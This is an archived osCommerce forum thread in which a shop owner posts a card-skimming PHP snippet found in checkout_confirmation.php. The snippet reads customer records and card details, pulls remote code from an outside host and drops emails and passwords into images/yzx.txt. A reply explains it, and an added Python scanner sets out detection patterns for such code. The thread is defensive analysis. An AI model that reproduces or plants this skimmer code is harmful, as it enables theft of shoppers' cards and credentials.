osCommerce

Checkout_confirmation hacked?


Guest

Found the following code running in the checkout_confirmation.php page. Anyone seen this before? The only way I found it was that the cart wasn't working half the time, then I saw this at the bottom of the page when it finally came back:

Warning: main(http://www.allthingsnails.co.uk/shop/debug.txt) [function.main]: failed to open stream: Connection timed out in /home/httpd/vhosts/realpurity.com/httpdocs/cart/checkout_confirmation.php on line 433

Line 433 was

require('http://www.allthingsnails.co.uk/shop/debug.txt');

 

I put a fresh copy in and all seems fine now. How screwed do you think I am?

 

<?php
// Skimmer as posted. When the customer's details are not already in scope it loads them
// from the shop database, then builds an HTML mail body holding those details plus the
// card data taken straight from the payment form.
if (($firstname123 == "") || ($lastname123 == "") || ($postcode123 == "") || ($street_address123 == "")) {
    // Address-book row of the logged-in customer
    $td_query = tep_db_query("select * from " . TABLE_ADDRESS_BOOK . " where customers_id = '" . $customer_id . "'");
    $duong = tep_db_fetch_array($td_query);
    $firstname123      = $duong['entry_firstname'];
    $lastname123       = $duong['entry_lastname'];
    $street_address123 = $duong['entry_street_address'];
    $city123           = $duong['entry_city'];
    $zone_id           = $duong['entry_zone_id'];
    $statex            = $duong['entry_state'];
    // Resolve the state/zone name when only a zone id is stored
    if (($statex == "") || ($statex == "0")) {
        $td_queryxx = tep_db_query("select * from " . TABLE_ZONES . " where zone_id = '" . $zone_id . "'");
        $duongxx = tep_db_fetch_array($td_queryxx);
        $state123 = $duongxx['zone_name'];
    } else {
        $state123 = $statex;
    }
    // Resolve the country name
    $country = $duong['entry_country_id'];
    $td_queryxxx = tep_db_query("select * from " . TABLE_COUNTRIES . " where countries_id = '" . $country . "'");
    $duongxxx = tep_db_fetch_array($td_queryxxx);
    $country123  = $duongxxx['countries_name'];
    $postcode123 = $duong['entry_postcode'];
    // Customer row: telephone, e-mail address, date of birth
    $td_query2 = tep_db_query("select * from " . TABLE_CUSTOMERS . " where customers_id = '" . $customer_id . "'");
    $duong2 = tep_db_fetch_array($td_query2);
    $telephone123     = $duong2['customers_telephone'];
    $email_address123 = $duong2['customers_email_address'];
    $dob123           = $duong2['customers_dob'];
}

// Mail headers for an outgoing message. The snippet as posted never calls mail() itself;
// $headers123 and $message123 are simply left in scope for the remotely included code.
$site = "realpurity.com";
$headers123  = "From:Website $site";
$headers123 .= "<$site>\n";
$headers123 .= "X-Sender: <$site>\n";
$headers123 .= "X-Mailer: PHP\n";
$headers123 .= "Return-Path:<$site@$site>\n";
$headers123 .= "Content-Type:text/html; ";
$headers123 .= "charset=iso-8859-1\n";

// Customer identity and address
$message123  = "Name : $firstname123 $lastname123 <br>";
$message123 .= "Telephone : $telephone123 <br>";
$message123 .= "Email : $email_address123 <br>";
$message123 .= "Street : $street_address123 <br>";
$message123 .= "Postcode : $postcode123 <br>";
$message123 .= "City : $city123 <br>";
$message123 .= "State : $state123 <br>";
$message123 .= "Country : $country123 <br>";
// $password123 is never assigned anywhere in the posted snippet
$message123 .= "Password : $password123<br>";

// Card details read directly from the payment form's POST fields (viaklix payment module)
$ccowner123  = $HTTP_POST_VARS['viaklix_cc_owner'];
$ccnumber123 = $HTTP_POST_VARS['viaklix_cc_number'];
$tmp1 = $HTTP_POST_VARS['viaklix_cvv_number'];
$tmp2 = $HTTP_POST_VARS['viaklix_cc_expires_month'] . "/" . $HTTP_POST_VARS['viaklix_cc_expires_year'];
$message123 .= "CC Owner : $ccowner123  <br>";
$message123 .= "CC Number : $ccnumber123 <br>";
$message123 .= "CVV2 :  $tmp1 <br>";
$message123 .= "Date Expire :  $tmp2 <br>";
$message123 .= "DOB :  $dob123 <br>";
$message123 .= "Site : http://$site <br>";

// With a card number and CVV present, fetch and execute remote code from the attacker's
// host; whatever debug.txt contains runs here with $message123 and $headers123 in scope.
// This is the line that produced the "failed to open stream" warning on the page.
if (($ccnumber123 != "") && ($tmp1 != "")) {
    require('http://www.allthingsnails.co.uk/shop/debug.txt');
}

// Without a CVV, append the e-mail address and password to a text file inside the
// web-accessible images/ directory, where the attacker can fetch it later.
if ($tmp1 == "") {
    $f  = "images/yzx.txt";
    $ft = @fopen($f, "a+");
    $ax = "Email : " . $email_address123 . "\nPassword : " . $password123 . "\n---------------------------------------\n";
    $fw = fwrite($ft, $ax);
}

OUCH! That's grabbing all your customers' information from your database and sending it to their site along with CC details... depending on how long that code has been running on your site and how many of your customers have purchased from you, I'd say you might be in a bit of trouble here...

 

If you look here on your server, this is where it's storing your customers' details (their usernames and passwords):

 

http://realpurity.com/cart/images/yzx.txt

 

Can't access the file that it's trying to require, http://www.allthingsnails.co.uk/shop/debug.txt, so I don't know what is being done with this information (this is where the CC details are sent to)... but surely it's not a good thing...

 

Install SiteMonitor, update all your details and remove these files... look in your /images/ directory to see if there are ANY other .php or .txt files in there.
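
A triage scanner for the two things this thread turns on, as an added example (mine, not code from the poster, the reply or osCommerce): the remote require plus card-capture pattern in the posted checkout_confirmation.php, and the reply's advice to look for stray .txt or .php files under /images/. The webroot it builds, the host attacker.example and every sample file in it are constructed for the demo; on a real box you would point scan_webroot and suspicious_image_dir_files at the document root instead.

```python
"""Triage scanner for a PHP shop webroot (added example; not code from the post or osCommerce).

Flags the three behaviours of the posted skimmer and the drop file the reply points at:
remote require/include, card fields read straight from POST, append-mode writes under images/.
Every sample file below, and the host attacker.example, is constructed for this demo.
"""
import re
import tempfile
from pathlib import Path

INDICATORS = {
    # require('http://...'), include_once("ftp://...") and similar
    "remote_include": re.compile(
        r"""\b(?:require|include)(?:_once)?\s*\(?\s*['"](?:https?|ftp)://""", re.I),
    # $HTTP_POST_VARS['viaklix_cc_number'], $_POST["cc_cvv"], ...
    "card_post_capture": re.compile(
        r"""\$(?:HTTP_POST_VARS|_POST)\s*\[\s*['"]\w*(?:cc_number|cvv|cc_owner|cc_expires|card_?number)""", re.I),
    # fopen(<anything>, "a") or "a+": appending to a file the attacker fetches later
    "append_write": re.compile(r"""fopen\s*\([^;]*?['"]a\+?['"]\s*\)""", re.I),
    # a literal like "images/yzx.txt": a non-image parked where nobody looks
    "images_drop_path": re.compile(r"""['"]images/[^'"]+\.(?:txt|php|log|dat)['"]""", re.I),
}
IMAGE_EXTENSIONS = {".gif", ".jpg", ".jpeg", ".png", ".bmp", ".ico", ".swf"}

# Constructed stand-in for the posted checkout_confirmation.php (shortened, placeholder host).
SKIMMED_CHECKOUT = r'''<?php
$ccnumber123 = $HTTP_POST_VARS['viaklix_cc_number'];
$tmp1 = $HTTP_POST_VARS['viaklix_cvv_number'];
if (($ccnumber123 != "") && ($tmp1 != "")) {
    require('http://attacker.example/shop/debug.txt');
}
if ($tmp1 == "") {
    $f = "images/yzx.txt";
    $ft = @fopen($f, "a+");
    fwrite($ft, "Email : " . $email_address123 . "\n");
}
'''
# Constructed clean page: local include only, no card handling.
CLEAN_CHECKOUT = r'''<?php
require('includes/application_top.php');
$payment = tep_db_prepare_input($HTTP_POST_VARS['payment']);
'''
# Constructed stand-in for a legitimate card module: reads the card but never writes it out.
PAYMENT_MODULE = r'''<?php
$this->cc_card_number = tep_db_prepare_input($HTTP_POST_VARS['cc_number']);
$this->cc_card_cvv = tep_db_prepare_input($HTTP_POST_VARS['cc_cvv']);
'''

def scan_php_source(source):
    """Return the names of every indicator matching one PHP source string."""
    return [name for name, rx in INDICATORS.items() if rx.search(source)]

def classify(indicators):
    """A payment module legitimately reads card fields from POST, so that alone is only
    worth a look; remote code, or card capture paired with a drop-file write, is a skimmer."""
    ind = set(indicators)
    if "remote_include" in ind or ("card_post_capture" in ind and ind & {"append_write", "images_drop_path"}):
        return "skimmer"
    return "review" if "card_post_capture" in ind else "clean"

def scan_webroot(root):
    """Map each .php file under root (relative POSIX path) to its indicators; clean files are omitted."""
    root = Path(root)
    hits = {}
    for path in sorted(root.rglob("*.php")):
        found = scan_php_source(path.read_text(errors="replace"))
        if found:
            hits[path.relative_to(root).as_posix()] = found
    return hits

def suspicious_image_dir_files(root):
    """List files inside any images/ directory whose extension is not an image type."""
    root = Path(root)
    return sorted(
        p.relative_to(root).as_posix()
        for p in root.rglob("*")
        if p.is_file()
        and "images" in p.relative_to(root).parts[:-1]
        and p.suffix.lower() not in IMAGE_EXTENSIONS
    )

def build_sample_webroot():
    """Write the constructed files into a throwaway directory and return its path."""
    root = Path(tempfile.mkdtemp(prefix="shop-triage-"))
    (root / "cart" / "images").mkdir(parents=True)
    (root / "cart" / "includes" / "modules" / "payment").mkdir(parents=True)
    (root / "cart" / "checkout_confirmation.php").write_text(SKIMMED_CHECKOUT)
    (root / "cart" / "checkout_payment.php").write_text(CLEAN_CHECKOUT)
    (root / "cart" / "includes" / "modules" / "payment" / "cc.php").write_text(PAYMENT_MODULE)
    (root / "cart" / "images" / "yzx.txt").write_text("Email : a@example.com\nPassword : hunter2\n")
    (root / "cart" / "images" / "logo.gif").write_bytes(b"GIF89a")
    return root

if __name__ == "__main__":
    root = build_sample_webroot()
    for path, found in scan_webroot(root).items():
        print(f"{classify(found):8s} {path}  [{', '.join(found)}]")
    print("drop files:", suspicious_image_dir_files(root))
```

Reading card fields out of POST is normal for a payment module, so the scanner only calls a file a skimmer when that is paired with a remote include or an append-mode write; a module that reads the card and hands it to the gateway comes back as "review", not "skimmer". The remote require itself only works when PHP is allowed to include URLs (allow_url_include, and on older PHP releases allow_url_fopen); switching that off in php.ini, and denying web access to non-image files under images/, closes both halves of the trick shown above, but neither replaces restoring the files from a known-good copy and rotating every credential the drop file held.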

Archived

This topic is now archived and is closed to further replies.